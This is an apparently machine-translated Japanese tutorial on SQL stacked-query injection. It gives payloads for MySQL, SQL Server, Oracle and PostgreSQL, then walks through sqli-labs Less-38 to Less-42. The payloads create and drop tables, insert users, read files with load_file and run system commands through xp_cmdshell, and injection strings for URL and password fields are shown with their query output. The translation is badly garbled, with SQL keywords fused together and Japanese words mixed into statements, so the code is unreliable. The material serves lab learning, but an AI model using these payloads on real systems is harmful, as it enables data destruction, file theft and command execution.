Jump to content

0x00スタックインジェクションの定義

名詞の意味から積み重ねられた注入(スタックインジェクション)は、一緒に実行されるSQLステートメント(複数のエントリ)の束であることがわかります。これは実際の使用でも当てはまります。 MySQLでは、主なことはコマンドラインの最後に各ステートメントを追加することであることを知っています。ステートメントの終了を示します。このようにして、複数の文を一緒に使用できるかどうかを考えました。これは積み重ねられた注入と呼ばれます。

0x01スタッキングインジェクション原理

SQL、Semicolon(;)は、SQLステートメントの終了を表すために使用されます。 SQLステートメントを終了した後、次のステートメントを作成し続けると、それが一緒に実行されると想像してください。したがって、このアイデアはスタックインジェクションを作成します。ユニオンインジェクション(ユニオンインジェクション)も2つのステートメントをマージします。 2つに違いはありますか?違いは、UnionまたはUnionallによって実行されたステートメントのタイプが制限されており、クエリステートメントを実行するために使用できることです。一方、スタックインジェクションは任意のステートメントを実行できることです。たとえば、次の例。ユーザー入力:1; DeleteFromProductsサーバー側SQLステートメントは次のとおりです。Select*FromProductswhereProductid=1;削除クエリが実行されると、最初のアイテムがクエリ情報を表示し、2番目のアイテムがテーブル全体を削除します。

0x02スタックインジェクションの制限

スタックインジェクションの制限は、すべての環境を実行できるわけではなく、APIまたはデータベースエンジンによって制限される可能性があることです。もちろん、許可が不十分なのは、攻撃者がデータを変更したり、一部のプログラムを呼び出すことができない理由を説明することもできます。

1049983-20211216003741523-912661499.gif

私の個人テスト環境はPHP+MySQLであり、実行できるため、この図は元のテキストから傍受されます。ここにはMySQL/PHPに疑問があります。しかし、私は個人的に、元の著者は私のバージョンとは異なるかもしれないと推定しています。前に述べましたが、スタッキングクエリは任意のSQLステートメントを実行できると述べましたが、この注入方法はあまり完全ではありません。私たちのWebシステムでは、コードは通常1つのクエリ結果のみを返すため、2番目のステートメントのスタックインジェクションはエラーを生成するか、結果を無視でき、フロントエンドインターフェイスのリターン結果を確認できません。したがって、データを読むときは、組合(組合)注入を使用することをお勧めします。同時に、スタックインジェクションを使用する前に、テーブル名、列名などのデータベース関連情報も知る必要があります。

0x03各データベースインスタンスの概要

このセクションでは、一般的なデータベースの観点からいくつかのタイプのデータベースの関連する使用法を紹介します。データベースの基本操作、追加、削除、チェック、変更。以下には、データベース関連のスタックインジェクションの基本操作がリストされています。

1.mysql

(1)新しいテーブルを作成します

select*fromuserswhered=1; createTableTestlikeUsers;

1049983-20211216003742098-1993864554.gif

実行が成功したら、新しい成功したテーブルが作成されているかどうかを確認しましょう。

1049983-20211216003742522-474871897.gif

(2)上記の新しく作成されたテストテーブルを削除します

[fromuserswhereId=1; droptabletest;を選択します。

1049983-20211216003742901-993499842.gif

1049983-20211216003743297-915606070.gif

(3)queryデータselect*fromuserswhereId=1; select1,2,3;

1049983-20211216003743828-2087962944.gif

(4)ファイルをロードします

select*fromuserswhereId=1; selectload_file( 'c:/tmpupbbn.php');

1049983-20211216003744230-1857708959.gif

(4)データを変更する*fromuserswhereId=1; insertIntousers(id、username、password)を選択する

値( '100'、 'new'、 'new');

1049983-20211216003744627-1567978468.gif

1049983-20211216003745110-1285265077.gif

2。

SQL Server(1)はデータテーブルを追加します

Select*fromTest; createTablesc3(sschar(8));

1049983-20211216003745532-130628123.gif

(2)データテーブルを削除します

*fromtest; droptablesc3を選択します。

1049983-20211216003745994-798971803.gif

(4)クエリデータ

select1,2,3; select*fromtest;

1049983-20211216003746497-1521669343.gif

(5)データを変更します

select*fromtest; updatetestsetname='test'howeryId=3;

1049983-20211216003746948-1132698356.gif

1049983-20211216003747459-1821902855.gif

(5)SQLServerで最も重要なストアドプロシージャの実行

select*fromtesthowhereid=1; execmaster.xp_cmdshell'ipconfig '

1049983-20211216003747953-836815551.gif

3.Oracle

上記の紹介では、Oracleはスタックインジェクションを使用できないと述べました。図から、2つのステートメントが同じ行にある場合、エラーが直接報告されることを確認できます。無効な文字。私は次のものを試し続けません。

1049983-20211216003748350-1196037798.gif

4.postgresql

(1)新しいテーブルを作成します

select*fromuser_test; createTableUser_data(iddate);

1049983-20211216003748790-309845210.gif

1049983-20211216003749196-1371292520.gif

user_dataテーブルが構築されていることがわかります。

(2)select*fromuser_test; deletefromuser_dataの上に新しく作成されたuser_dataテーブルを削除します。

1049983-20211216003749670-2136129134.gif

(3)クエリデータ

[fromuser_test; select1,2,3をselect]を選択します。

1049983-20211216003750243-156927732.gif(4)

データを変更します

select*fromuser_test; updateuser_testsetname='modify'wherename=' zhang san ';

1049983-20211216003750998-204248349.gif

0x04 SQLLAPS列の積み重ねられた注入

1.レス-38

スタックインジェクション - 文字タイプ - 取得(1)ソースコード

$ sql='select

*ユーザーからid='$ id' limit 0,1 ';

(2)テスト

?id=1 ’;ユーザーに挿入(ID、ユーザー名、パスワード)値

(「38」、「less38」、「こんにちは」) - +

mysql select * fromユーザー。

+---+-------------------------------+

| ID |ユーザー名|パスワード|

+---+-------------------------------+

| 1 |愚かな|愚かな|

| 2 |アンジェリーナ

| i-kill-you |

| 3 |

ダミー| P@SSWORD |

| 4 |

セキュア| Crappy |

| 5 |

愚かな|愚かさ|

| 6 |スーパーマン

| genious |

| 7 |

バットマン|暴徒!le |

| 8 |

管理者|管理者|

| 9 |

admin1 | admin1 |

| 10 | admin2 | admin2 |

| 11 | admin3 | admin3 |

| 12 |ダッカン|ダンボ|

| 14 | admin4 | admin4 |

| 38 |レッスル38 |こんにちは|

+---+-------------------------------+

セットの14行(0.00秒)

より少ない38ユーザーが追加されていることがわかりました

?id=1 ’;テーブルを作成します。

?id=1 ’;ドロップテーブルレッスル38;

2.レス-39

スタックインジェクション - 整数- (1)ソースコードを取得します

$ sql='select * fromユーザーからid=$ id lime

0,1 ';

(2)テスト

?id=1; inserting into users(id、username、password)値

(「39」、「less39」、「こんにちは」) - +

mysql select * fromユーザー。

+---+-------------------------------+

| ID |ユーザー名|パスワード|

+---+-------------------------------+

| 1 |愚かな|愚かな|

| 2 |アンジェリーナ

| i-kill-you |

| 3 |

ダミー| P@SSWORD |

| 4 |

セキュア| Crappy |

| 5 |

愚かな|愚かさ|

| 6 |スーパーマン

| genious |

| 7 |

バットマン|暴徒!le |

| 8 |

管理者|管理者|

| 9 |

admin1 | admin1 |

| 10 | admin2 | admin2 |

| 11 | admin3 | admin3 |

| 12 |ダッカン|ダンボ|

| 14 | admin4 | admin4 |

| 38 |レッスル38 |こんにちは|

| 39 |レッスル39 |こんにちは|

+---+-------------------------------+

セットの15行(0.00秒)

Less39ユーザーが追加されていることがわかります

?id=1;テーブルを作成します。

?id=1;ドロップテーブルレッスル39;

3.Less-40

ブラインド - スタックオーバーフロー

$ sql='select * from users from id=(' $ id ')制限

0,1 ';

(2)テスト

?id=1 ’);ユーザーに挿入(ID、ユーザー名、パスワード)

値(「40」、「less40」、「hello」) - +

mysql select * fromユーザー。

+-----+-------------------------------+

| ID |ユーザー名

|パスワード|

+-----+-------------------------------+

| 1 |

愚かな|愚かな|

| 2 |アンジェリーナ

| i-kill-you |

| 3 |

ダミー| P@SSWORD |

| 4 |

セキュア| Crappy |

| 5 |

愚かな|愚かさ|

| 6 |スーパーマン

| genious |

| 7 |

バットマン|暴徒!le |

| 8 |

管理者|管理者|

| 9 |

admin1 | admin1 |

| 10 |

admin2 | admin2 |

| 11 |

admin3 | admin3 |

| 12 |

ダッカン|ダンボ|

| 14 |

admin4 | admin4 |

| 38 |

レッスル38 |こんにちは|

| 39 |

レッスル39 |こんにちは|

| 109 |こんにちは|こんにちは|

| 40 |

LESS40 |こんにちは|

+-----+-------------------------------+

セットの17行(0.00秒)

追加されたLess40ユーザーを参照してください

?id=1 ’);テーブルを作成します。

?id=1 ’);ドロップテーブルless40;

4.レス-41

ブラインド - スタックインジェクション - 整数- 取得(1)ソースコード

$ sql='select * fromユーザーからid=$ id lime

0,1 ';

(2)テスト(ブラインド)

ユーザーテーブルを作成し、フィールド値を上げます

?id=1;ユーザー(ID、ユーザー名、パスワード)値に挿入します

(「110」、「less41」、「こんにちは」) - +

mysql select * fromユーザー。

+-----+-------------------------------+

| ID |ユーザー名

|パスワード|

+-----+-------------------------------+

| 1 |

愚かな|愚かな|

| 2 |アンジェリーナ

| i-kill-you |

| 3 |

ダミー| P@SSWORD |

| 4 |

セキュア| Crappy |

| 5 |

愚かな|愚かさ|

| 6 |スーパーマン

| genious |

| 7 |

バットマン|暴徒!le |

| 8 |

管理者|管理者|

| 9 |

admin1 | admin1 |

| 10 |

admin2 | admin2 |

| 11 |

admin3 | admin3 |

| 12 |

ダッカン|ダンボ|

| 14 |

admin4 | admin4 |

| 38 |

レッスル38 |こんにちは|

| 39 |

レッスル39 |こんにちは|

| 109 |こんにちは|こんにちは|

| 40 |

LESS40 |こんにちは|

| 110 | LESS41 |こんにちは|

+-----+-------------------------------+

セットの18行(0.00秒)

追加されたユーザーレッスル41

?id=1;テーブルを作成します。 //テーブルを追加します

?id=1;ドロップテーブルless41; //テーブルを削除します

5.レス-42

エラー報告スタックインジェクション-Character-Post(1)ソースコード(login.php):

$ username=mysqli_real_escape_string($ con1、

$ _POST ['login_user']);

$ password=$ _post ['login_password'];

$ sql='select * from users where

username='$ username'およびpassword='$ password' '; //パスワード

変数は、ポストプロセス中に通過しませんでした

mysql_real_escape_string()関数の処理。したがって、ログインすると、パスワードオプションを攻撃できます。

(2)エラーテスト

テストステートメント:

ユーザー名:任意

パスワード:C ';ドロップテーブルME##MEテーブルを削除します

または:

ユーザー名:任意

パスワード:

c ';ユーザーのようにテーブルを作成#//create a

私のテーブル

ログインする前にテーブルを確認してください。

MySQLは表を表示します。

+----------------------------+

| tables_in_security |

+----------------------------+

|メール|

|参照者|

| uagents |

|ユーザー|

+----------------------------+

セットの4行(0.00秒)

ログインする前にテーブルを作成します

ユーザー名:admin

パスワード:

c ';テーブルレッスルを作成します

ユーザーのように#

ログインして作成テーブルを表示します

MySQLは表を表示します。

+----------------------------+

| tables_in_security |

+

0 Comments

Recommended Comments

There are no comments to display.

Guest
Add a comment...